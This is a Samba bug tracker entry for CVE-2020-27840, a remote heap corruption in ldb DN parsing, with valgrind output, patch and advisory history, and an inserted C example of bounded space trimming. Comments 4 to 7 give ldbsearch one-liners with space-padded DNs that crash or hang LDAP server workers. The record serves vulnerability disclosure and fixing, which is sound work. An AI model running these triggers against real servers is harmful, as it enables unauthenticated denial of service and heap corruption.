Bug 14595 (CVE-2020-27840) - CVE-2020-27840 [SECURITY] Unauthenticated remote heap corruption via bad DNs
Summary: CVE-2020-27840 [SECURITY] Unauthenticated remote heap corruption via bad DNs
Status: RESOLVED FIXED
Alias: CVE-2020-27840
Product: Samba 4.1 and newer
Classification: Unclassified
Component: AD: LDB/DSDB/SAMDB
Version: unspecified
Hardware: All All
Importance: P5 normal
Target Milestone: ---
Assignee: Karolin Seeger
QA Contact: Samba QA Contact
URL:
Keywords:
Depends on:
Blocks: 14661
Reported: 2020-12-11 03:42 UTC by Douglas Bagnall
Modified: 2021-05-03 00:52 UTC
CC: 7 users

See Also:


Attachments
proof of concept (2.83 KB, patch)
2020-12-11 03:42 UTC, Douglas Bagnall
no flags
the immediate fix (726 bytes, patch)
2020-12-11 03:42 UTC, Douglas Bagnall
no flags
Advisory v1 (1.81 KB, text/plain)
2021-01-08 01:43 UTC, Douglas Bagnall
no flags
patch with more explanatory text. (3.98 KB, patch)
2021-02-11 02:25 UTC, Douglas Bagnall
no flags
Advisory v2 (2.41 KB, text/plain)
2021-02-11 02:25 UTC, Douglas Bagnall
abartlet: review+
patch for master (9.04 KB, patch)
2021-02-11 22:38 UTC, Douglas Bagnall
abartlet: review+
dbagnall: ci-passed+
patch for 4.14 (9.04 KB, patch)
2021-02-11 22:39 UTC, Douglas Bagnall
abartlet: review+
patch for 4.13 (9.04 KB, patch)
2021-02-11 22:39 UTC, Douglas Bagnall
abartlet: review+
patch for 4.12 (9.04 KB, patch)
2021-02-11 22:40 UTC, Douglas Bagnall
abartlet: review+
patch for 4.11 (9.32 KB, patch)
2021-02-11 22:41 UTC, Douglas Bagnall
abartlet: review+
patch for unsupported Samba 4 versions (3.99 KB, patch)
2021-02-11 22:51 UTC, Douglas Bagnall
no flags
patch for master (v2, with Reviewed-by: abartlet) (9.18 KB, patch)
2021-02-16 22:38 UTC, Douglas Bagnall
abartlet: review+
dbagnall: ci-passed+
patch for 4.14 v2 (9.18 KB, patch)
2021-02-16 22:40 UTC, Douglas Bagnall
abartlet: review+
dbagnall: ci-passed+
patch for 4.13 v2 (9.18 KB, patch)
2021-02-16 22:40 UTC, Douglas Bagnall
abartlet: review+
dbagnall: ci-passed+
patch for 4.12 v2 (9.18 KB, patch)
2021-02-16 22:41 UTC, Douglas Bagnall
abartlet: review+
dbagnall: ci-passed+
patch for 4.11 v2 (9.47 KB, patch)
2021-02-16 22:42 UTC, Douglas Bagnall
abartlet: review+
dbagnall: ci-passed+
Updated Advisory v3 including version numbers (2.43 KB, text/plain)
2021-03-12 08:43 UTC, Karolin Seeger
dbagnall: review-
abartlet: review+
Updated advisory v4 (2.43 KB, text/plain)
2021-03-15 08:04 UTC, Karolin Seeger
dbagnall: review+

Description Douglas Bagnall 2020-12-11 03:42:08 UTC
Created attachment 16365 [details]
proof of concept

A DN string with particular patterns of trailing space can cause ldb_dn_explode to wander away and put zero bytes in arbitrary places in the heap.

From the proof of concept:

$ valgrind bin/default/lib/ldb/explode_ldb_dn_explode 
==1732366== Memcheck, a memory error detector
==1732366== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==1732366== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info
==1732366== Command: bin/default/lib/ldb/explode_ldb_dn_explode
==1732366== 
==1732366== Invalid write of size 1
==1732366==    at 0x48667CE: ldb_dn_explode (ldb_dn.c:722)
==1732366==    by 0x48669DA: ldb_dn_validate (ldb_dn.c:754)
==1732366==    by 0x1091E0: main (explode_ldb_dn_explode.c:12)
==1732366==  Address 0x4c157a7 is 9 bytes before a block of size 211 alloc'd
==1732366==    at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1732366==    by 0x4AD2365: __talloc_with_prefix (talloc.c:783)
==1732366==    by 0x4AD24FF: __talloc (talloc.c:825)
==1732366==    by 0x4AD299C: _talloc_named_const (talloc.c:982)
==1732366==    by 0x4AD6B26: _talloc_array (talloc.c:2763)
==1732366==    by 0x4865B71: ldb_dn_explode (ldb_dn.c:343)
==1732366==    by 0x48669DA: ldb_dn_validate (ldb_dn.c:754)
==1732366==    by 0x1091E0: main (explode_ldb_dn_explode.c:12)
==1732366== 
==1732366== 


This is due to interactions between the way trailing space and leading space are handled.

I have a simple fix for this one, and an ongoing series of patches to stop ldb_dn_explode doing this to us.
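The description above attributes the corruption to the interaction between trailing-space and leading-space handling in ldb_dn_explode, with valgrind showing the write landing in front of the allocated block. As an added illustration, which is not Samba's or ldb's code, here is a constructed DN-component trimmer in which both the leading and the trailing scan are confined to the component's own span, so a value that is nothing but spaces (the `c= ` component in the strings discussed in this bug) trims to empty instead of the scan leaving the buffer. All function names and inputs below are invented for the example.

```c
/* Added illustration, not Samba's ldb_dn_explode: trimming the value part
 * of a DN component ("a=b   ", "c= ") with both scans bounded by the
 * component's own span.  Names and inputs below are constructed. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Length of `value` after stripping leading and trailing ASCII spaces;
 * the start offset of the kept bytes is written to *start.  The trailing
 * scan stops at the leading-scan position, so a value that is all spaces
 * (or empty) yields 0 rather than a scan that walks in front of the
 * buffer and writes there. */
size_t trim_spaces(const char *value, size_t len, size_t *start)
{
    size_t lo = 0, hi = len;
    while (lo < hi && value[lo] == ' ') lo++;
    while (hi > lo && value[hi - 1] == ' ') hi--;
    *start = lo;
    return hi - lo;
}

/* Split one "attr=value" component into NUL-terminated copies.  Returns
 * 0 on success, -1 if there is no '=', the attribute is empty, or an
 * output buffer is too small; every write is checked against the sizes. */
int parse_component(const char *comp, size_t comp_len,
                    char *attr, size_t attr_sz, char *val, size_t val_sz)
{
    const char *eq = memchr(comp, '=', comp_len);
    if (eq == NULL) return -1;
    size_t attr_raw = (size_t)(eq - comp);
    size_t val_raw = comp_len - attr_raw - 1;
    size_t astart, vstart;
    size_t alen = trim_spaces(comp, attr_raw, &astart);
    size_t vlen = trim_spaces(eq + 1, val_raw, &vstart);
    if (alen == 0 || alen + 1 > attr_sz || vlen + 1 > val_sz) return -1;
    memcpy(attr, comp + astart, alen);
    attr[alen] = '\0';
    memcpy(val, eq + 1 + vstart, vlen);
    val[vlen] = '\0';
    return 0;
}

/* Trimmed value length of a single component, or -1 if malformed. */
long component_value_len(const char *comp)
{
    char attr[64], val[1024];
    if (parse_component(comp, strlen(comp), attr, sizeof attr, val, sizeof val) != 0)
        return -1;
    return (long)strlen(val);
}

/* Parse a comma-separated DN; returns the number of components or -1 on
 * the first malformed one (an empty component, e.g. after a trailing
 * comma, is malformed).  The empty string has no components. */
int parse_dn(const char *dn)
{
    const char *p = dn, *end = dn + strlen(dn);
    int count = 0;
    if (*dn == '\0') return 0;
    for (;;) {
        const char *comma = memchr(p, ',', (size_t)(end - p));
        size_t clen = comma ? (size_t)(comma - p) : (size_t)(end - p);
        char attr[64], val[1024];
        if (parse_component(p, clen, attr, sizeof attr, val, sizeof val) != 0)
            return -1;
        count++;
        if (comma == NULL) break;
        p = comma + 1;
    }
    return count;
}

/* Build "a=b<nspaces spaces>,c= " (the shape of the strings discussed in
 * this bug, constructed here) and parse it with the bounded parser. */
int parse_padded_dn(size_t nspaces)
{
    char buf[4096];
    size_t n = 0;
    if (nspaces + 8 > sizeof buf) return -1;
    memcpy(buf + n, "a=b", 3); n += 3;
    memset(buf + n, ' ', nspaces); n += nspaces;
    memcpy(buf + n, ",c= ", 4); n += 4;
    buf[n] = '\0';
    return parse_dn(buf);
}

int main(void)
{
    size_t sp[] = {0, 106, 600};
    for (size_t i = 0; i < sizeof sp / sizeof sp[0]; i++)
        printf("%zu padding spaces -> %d components\n", sp[i], parse_padded_dn(sp[i]));
    printf("value length of \"c= \" -> %ld\n", component_value_len("c= "));
    return 0;
}
```

The point of the two `while` loops in `trim_spaces` is that the trailing scan can never move below the position the leading scan reached, whatever mix of spaces the value contains; the caller passes explicit lengths rather than relying on a terminator, so the parser has no way to address bytes outside the component it was handed.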
Comment 1 Douglas Bagnall 2020-12-11 03:42:44 UTC
Created attachment 16366 [details]
the immediate fix
Comment 2 Douglas Bagnall 2020-12-11 03:46:48 UTC
found with the help of Honggfuzz.
Comment 3 Douglas Bagnall 2020-12-12 22:06:17 UTC
Following the logic of bug #14049, this might not be a security issue, because it can't be remotely triggered.

OTOH, there might be a way to connect these e.g. dots:

1. ldap_decode()

2. case ASN1_APPLICATION() => asn1_read_OctetString_talloc(), we have the verbatim crafted DN string.

3. ldapsrv_BindSimple() calls authenticate_ldap_simple_bind_send() with the dn as name.

4. ...a maze of cracknames...

5. DsCrackNameOneName():

	/* A LDAP DN as a string */
	case DRSUAPI_DS_NAME_FORMAT_FQDN_1779: {
		domain_filter = NULL;
		name_dn = ldb_dn_new(mem_ctx, sam_ctx, name);
		if (! ldb_dn_validate(name_dn)) {
Comment 4 Douglas Bagnall 2020-12-12 22:27:52 UTC
The trouble of course is in constructing the ASN1.

Using the ldb clients of course crashes on the client side:

$ bin/ldbsearch -H ldap://$SERVER -U$USERNAME%$PASSWORD -b "$(printf 'a=b%*s,c= ' 600 ' ')"
corrupted double-linked list
^C

and other ldap tools just don't seem to want to do it.
Comment 5 Douglas Bagnall 2020-12-13 06:04:14 UTC
It's actually quite easy using attributes.

This kills all the ldap workers in my testenv:

for i in {1..20}; do  x=$((i * 20)); echo $x; bin/ldbsearch -H ldap://$SERVER -U$USERNAME%$PASSWORD  "(member=$(printf 'a=b%*s,c= ' $x ' '))" ; done
Comment 6 Douglas Bagnall 2020-12-13 19:44:35 UTC
This in a testenv:

$ for i in {1..200}; do  x=$((i * 99)); echo $x; bin/ldbsearch -H ldaps://$SERVER --simple-bind-dn="$(printf 'a=b%*s,c= ' $x ' ')" --password=sdfsdfsd -kno  ; done

causes "corrupted double-linked list" and/or crashes on the server.
Comment 7 Douglas Bagnall 2020-12-13 20:09:17 UTC
(In reply to Douglas Bagnall from comment #6)

At some offsets, like '106':

$ bin/ldbsearch -H ldaps://$SERVER --simple-bind-dn="$(printf 'a=b%*s,c= ' 106 ' ')" --password=sdfsdfsd -kno


I get "free(): invalid pointer" and the worker hangs on __lll_lock_wait_private (), so the parent does not restart it (as would happen with a segfault or abort).

Even as a DoS, heap corruption is worse.
Comment 8 Andrew Bartlett 2020-12-14 00:01:05 UTC
CVSSv3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5) for the DoS only, but I agree, this is likely worse (but how much worse is hard to know). 

I've requested a CVE number from Red Hat.
Comment 9 Douglas Bagnall 2021-01-08 01:43:07 UTC
Created attachment 16383 [details]
Advisory v1
Comment 10 Douglas Bagnall 2021-02-11 02:23:47 UTC
Confirmed in various Samba versions from 4.1 to 4.13.
Comment 11 Douglas Bagnall 2021-02-11 02:25:10 UTC
Created attachment 16441 [details]
patch with more explanatory text.
Comment 12 Douglas Bagnall 2021-02-11 02:25:48 UTC
Created attachment 16442 [details]
Advisory v2
Comment 13 Douglas Bagnall 2021-02-11 22:38:48 UTC
Created attachment 16444 [details]
patch for master
Comment 14 Douglas Bagnall 2021-02-11 22:39:28 UTC
Created attachment 16445 [details]
patch for 4.14
Comment 15 Douglas Bagnall 2021-02-11 22:39:57 UTC
Created attachment 16446 [details]
patch for 4.13
Comment 16 Douglas Bagnall 2021-02-11 22:40:24 UTC
Created attachment 16447 [details]
patch for 4.12
Comment 17 Douglas Bagnall 2021-02-11 22:41:01 UTC
Created attachment 16448 [details]
patch for 4.11
Comment 18 Douglas Bagnall 2021-02-11 22:51:05 UTC
Created attachment 16449 [details]
patch for unsupported Samba 4 versions

The "patch for unsupported Samba 4 versions" applies to 4.5 and should work on anything from 4.0 to 4.10. It doesn't have the tests. To test on these platforms, use the proof of concept patch or the shell snippets in the comments here (or, better still, UPGRADE).

Patches for master, 4.14, 4.13, 4.12 are all essentially identical.

The patch for 4.11 differs only because the surrounding tests have changed in the meantime.
Comment 19 Andrew Bartlett 2021-02-16 00:37:22 UTC
Even with the clear explanation in the commit message, this makes my head spin.
Comment 20 Douglas Bagnall 2021-02-16 22:38:34 UTC
Created attachment 16460 [details]
patch for master (v2, with Reviewed-by: abartlet)
Comment 21 Douglas Bagnall 2021-02-16 22:40:15 UTC
Created attachment 16461 [details]
patch for 4.14 v2
Comment 22 Douglas Bagnall 2021-02-16 22:40:59 UTC
Created attachment 16462 [details]
patch for 4.13 v2
Comment 23 Douglas Bagnall 2021-02-16 22:41:35 UTC
Created attachment 16463 [details]
patch for 4.12 v2
Comment 24 Douglas Bagnall 2021-02-16 22:42:25 UTC
Created attachment 16464 [details]
patch for 4.11 v2
Comment 25 Andrew Bartlett 2021-02-17 08:04:40 UTC
I think there is just CI and filling in the $VERSIONS to go on this one, and then it will be ready.
Comment 26 Douglas Bagnall 2021-02-17 20:40:48 UTC
Advisory $VERSIONS is still to be determined.
Comment 27 Andrew Bartlett 2021-02-26 19:32:43 UTC
Is this the same as bug 10122 reported in 2013?
Comment 28 Douglas Bagnall 2021-02-28 00:20:39 UTC
(In reply to Andrew Bartlett from comment #27)
> Is this the same as bug 10122 reported in 2013?

I think not. The whitespace in examples there consists mostly or wholly of line breaks, and only one or two of them. This bug only affects real 0x20 space characters.
Comment 29 Karolin Seeger 2021-03-12 08:43:41 UTC
Created attachment 16530 [details]
Updated Advisory v3 including version numbers

Add version numbers, a username -> an username
Comment 30 Douglas Bagnall 2021-03-12 23:45:55 UTC
Comment on attachment 16530 [details]
Updated Advisory v3 including version numbers

Actually "a username" seems more correct to me.

I have a funny dialect, but Google agrees.
Comment 31 Karolin Seeger 2021-03-15 08:04:34 UTC
Created attachment 16547 [details]
Updated advisory v4

an username -> a username
Comment 32 Karolin Seeger 2021-03-15 10:17:34 UTC
Planned release date 2021-03-24.
Comment 33 Samba QA Contact 2021-03-24 08:56:38 UTC
This bug was referenced in samba v4-14-stable (Release samba-4.14.1):

c82bea2b723b55dca626fad9f9478d89c90cfd10
f89767bea7330ec1936d2312e2b1da7b435c04b7
2d82f0e1b84bb390dbf6a3547e4234bfec4eac21
Comment 34 Samba QA Contact 2021-03-24 08:57:37 UTC
This bug was referenced in samba v4-13-stable (Release samba-4.13.6):

7924431e7e4bbe41ca2224d8a560d504d6fb25f3
2193d84004581d68a6e5b5cac76b7c78bdfc4e33
56a72e2562a1e7c690ff2500309fce0371c3576d
Comment 35 Samba QA Contact 2021-03-24 08:59:02 UTC
This bug was referenced in samba v4-12-stable (Release samba-4.12.13):

d59379853d8ea755a0281969f98aeca133201894
4caf1ebc7a09d2743757da31db7e88b0321a3533
4d40e9ce9c7c36d8cd07cc79440811f97428bb80
Comment 36 Samba QA Contact 2021-03-24 10:37:59 UTC
This bug was referenced in samba v4-12-test:

d59379853d8ea755a0281969f98aeca133201894
4caf1ebc7a09d2743757da31db7e88b0321a3533
4d40e9ce9c7c36d8cd07cc79440811f97428bb80
Comment 37 Samba QA Contact 2021-03-24 10:53:19 UTC
This bug was referenced in samba v4-13-test:

7924431e7e4bbe41ca2224d8a560d504d6fb25f3
2193d84004581d68a6e5b5cac76b7c78bdfc4e33
56a72e2562a1e7c690ff2500309fce0371c3576d
Comment 38 Samba QA Contact 2021-03-24 10:56:54 UTC
This bug was referenced in samba v4-14-test:

c82bea2b723b55dca626fad9f9478d89c90cfd10
f89767bea7330ec1936d2312e2b1da7b435c04b7
2d82f0e1b84bb390dbf6a3547e4234bfec4eac21
Comment 39 Stefan Metzmacher 2021-03-24 11:03:49 UTC
Note the following additional releases were made in order to
have standalone ldb releases with the fixes and let Samba depend on
them when using system libraries:

samba-4.12.14 (with ldb-2.1.5)
samba-4.13.7  (with ldb-2.2.1)
samba-4.14.2  (with ldb-2.3.0)
Comment 40 Samba QA Contact 2021-03-24 13:12:03 UTC
This bug was referenced in samba master:

1996b79f376b459bb964a6344ca5f264e7d6e2ec
dbb3e65f7e382adf5fa6a6afb3d8684aca3f201a
9532c44baea130db74f866e1472cb871936cd3dd
Comment 41 Karolin Seeger 2021-03-25 10:02:39 UTC
Samba 4.14.2 (4.14.1), 4.13.7 (4.13.6) and 4.12.14 (4.12.13) have been shipped to address this defect.
Closing out bug report.

Thanks!
Comment 42 Douglas Bagnall 2021-05-01 01:53:38 UTC
Belatedly making this public.
Comment 43 Andrew Bartlett 2021-05-03 00:52:15 UTC
Removing samba-vendor from CC.  Subscribe manually with your own account on the CC if you need to follow along from here.